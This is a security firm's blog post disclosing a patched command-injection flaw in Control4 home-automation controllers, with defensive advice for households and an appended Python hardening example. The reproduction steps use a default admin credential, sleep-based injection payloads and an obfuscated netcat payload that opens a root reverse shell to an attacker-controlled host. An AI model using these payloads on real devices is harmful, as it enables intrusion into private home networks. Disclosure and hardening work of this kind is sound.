Aon’s Cyber Secure Select offers products and services that help protect the assets of executives, high-net-worth individuals, and their families. The Executive Vulnerability Assessment is a personalized security vulnerability evaluation meant to assess and improve an individual’s security posture. Continuing our APT X series, this blog post provides a small insight into what happens behind the scenes during the home network penetration testing phase of an Executive Vulnerability Assessment by demonstrating what a real-world Advanced Persistent Threat attack against an individual might look like. This includes the details of a zero-day vulnerability discovered and leveraged during an actual assessment.
Executive Vulnerability Assessments help our clients better understand their personal attack surface. Ultimately, this helps our clients protect themselves against targeted attacks that may lead to the unauthorized disclosure of sensitive personal or corporate information that may be accessible from an executive’s home network.
In this type of engagement, the initial foothold within the network of a high-net-worth individual is often obtained by targeting devices used by their family members. Online reconnaissance is performed to identify the types of technology the family may utilize, followed by the deployment of some preliminary payloads to improve situational awareness of the victim’s environment prior to sending more complex payloads. Social engineering is the primary technique used to deliver these payloads to the victim(s) and, upon successful execution, an initial foothold is established within the home network. In some cases, wireless attacks are also viable and provide an easy initial foothold within the home network.
During the course of an engagement last summer, after establishing an initial foothold within the executive’s network, we discovered a zero-day vulnerability affecting Control4 home automation systems running firmware versions prior to 3.2.0, such as the EA-1 and EA-3 Entertainment and Automation Controller devices. This vulnerability presented the attacker with remote code execution capabilities as the root user on the underlying operating system. The issue was disclosed to Control4, who responded that they were already aware of the issue and that a fix was in beta at the time. Nevertheless, they thanked us for the report. Control4 has since informed us that the vulnerability has been remediated in firmware version 3.2.0, released in October 2020. Neither Aon nor Control4 is aware of any exploitation of this vulnerability in the wild, and we would like to commend Control4 for quickly patching the issue. Users of affected systems are advised to contact a certified Control4 dealer to arrange for a firmware update. If this is not possible, we recommend placing affected devices in a separate network segment that is isolated from high-value devices.
Vulnerabilities in entertainment systems and other IoT devices can often yield a potent foothold within a home network. In this case, we utilized this vulnerability, as well as a few others, to establish long-term persistence within multiple hosts inside the network.
Due to the increasing prevalence of IoT devices, it becomes critically important for individuals to implement positive security practices in their own households. The following non-exhaustive list contains some suggestions:
- Implement network segmentation to isolate non-critical devices from high-value devices.
- Conduct routine inventory of what is running inside your home network. Minimize the number of devices online and ensure that every device is running the most recent versions of firmware / software.
- Ensure that every exposed service on every device is protected with a strong password, if possible.
- Ensure that default passwords are changed when the devices are configured.
- Ensure that access points utilize a strong password and are protected by at least WPA2-PSK for home networks; certificate-based authentication is preferable, though likely not practical for most households.
- Ensure that port-forwarding is disabled on routers, particularly if these devices are externally exposed.
- Ensure that previously compromised credentials, such as from public password breaches, are not utilized.
- Identify the purpose of and limit any externally exposed services on your router.
The following section provides in-depth technical details of the remote code execution vulnerability discovered during the assessment.
Remote Code Execution in Control4 Entertainment and Automation Controller Devices
Overview
Control4 Entertainment and Automation Controller devices such as the EA-1 and EA-3 have a management interface implemented as a web application. This management interface provides a feature that allows authenticated administrators to view the device’s log files. The log retrieval functionality in firmware versions prior to 3.2.0 is vulnerable to remote code execution via command injection. The following steps describe how to reproduce this vulnerability on the affected devices.
Reproduction Steps
1. Open the device’s administrative interface in a web browser and log in as the System Admin user.
2. The System Admin password was not initially known during this assessment, but the targeted device still had the default password set for that account. This credential can be found at this public site: http://open-sez.me/passwd-control4.htm
3. After signing in, the Home screen will be displayed. Click on System Manager.
4. In the System Manager screen, click on a device under Discovered Devices.
5. After selecting a discovered device, click on Logging.
6. Under Logging, click on the name of a log file to retrieve. In this case, lighttpd was selected.
7. The following page will be displayed with an error message indicating that the /var/log/lighthttpd.log file does not exist.
8. Using a proxy tool such as the Burp Suite, examine the HTTP request made to obtain the lighttpd.log file and the error message returned in the response. The error message discloses the operating system command that was executed in order to retrieve the lighttpd.log file.
9. Using Burp Suite, manipulate the previous request to inject a call to the sleep command with a duration of 6 seconds and check the response time of the request. The injected payload in this case was ‘&sleep${IFS}6&’.
10. In order to confirm that the sleep command successfully executed, manipulate the same request again but this time change the sleep duration to 7 seconds. The response time should be approximately 7 seconds, as seen in the screenshot below. The injected payload in this case was ‘&sleep${IFS}7&’.
11. For a full remote shell as the root user, use the following payload replacing IP_ADDRESS with the public IP address of a server you control, which has a netcat listener running on port 4444. The injected payload should look like the following:
'&nc${IFS}IP_ADDRESS${IFS}4444${IFS}-e${IFS}${SHELL:0:1}bin${SHELL:0:1}sh&'
Note that the same process applies to obtain RCE on Control4 EA-1 devices using the same firmware version.
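The command-injection pattern described in the steps above, placed beside a hardened log-retrieval routine and a request-screening check, as an added Python example that is not Control4's code and not part of the original post. The handler names, the `cat` command string, the log-name-to-`.log` mapping, and the sample log line are assumptions; Control4's actual handler source is not public.

```python
import os
import re
import tempfile

# Hypothetical names: this models the pattern the write-up describes, a log name taken
# from the HTTP request and spliced into a shell command line on the controller.
LOG_DIR = "/var/log"
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")
# Shell metacharacters; '&' and '$' cover the ${IFS} separator trick used in the write-up's payloads.
INJECTION_MARKERS = re.compile(r"[;&|`<>$\n]")

def unsafe_command(log_name: str) -> str:
    """The vulnerable pattern, returned rather than executed: whatever the browser sent becomes
    part of a shell command line, so a value like '&sleep${IFS}6&' passes through verbatim."""
    return f"cat {LOG_DIR}/{log_name}.log"

def is_safe_log_name(log_name: str) -> bool:
    """Allow only a single plain file-name token: no separators, metacharacters or traversal."""
    return bool(SAFE_NAME.match(log_name)) and ".." not in log_name

def read_log(log_name: str, log_dir: str = LOG_DIR) -> str:
    """Hardened retrieval: validate the token, confine the path to log_dir, read with no shell."""
    if not is_safe_log_name(log_name):
        raise ValueError(f"rejected log name: {log_name!r}")
    base = os.path.realpath(log_dir)
    path = os.path.realpath(os.path.join(base, log_name + ".log"))
    if os.path.dirname(path) != base:
        raise ValueError("path escapes log directory")
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()

def looks_like_injection(param_value: str) -> bool:
    """Screening check for the log-name parameter, usable in a WAF rule or access-log review."""
    return bool(INJECTION_MARKERS.search(param_value))

def make_sample_log_dir() -> str:
    """Constructed fixture: a temporary directory holding one lighttpd.log for demonstration."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "lighttpd.log"), "w", encoding="utf-8") as fh:
        fh.write("2020-08-01 12:00:00: (log.c.217) server started (constructed sample line)\n")
    return d

if __name__ == "__main__":
    sample_dir = make_sample_log_dir()
    for name in ("lighttpd", "&sleep${IFS}6&"):
        verdict = "flagged" if looks_like_injection(name) else "clean"
        print(f"{name!r}: {verdict}; shell string would be {unsafe_command(name)!r}")
```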
Author: Faisal Tameesh (@primal0xF7)
Copyright 2021 Aon Plc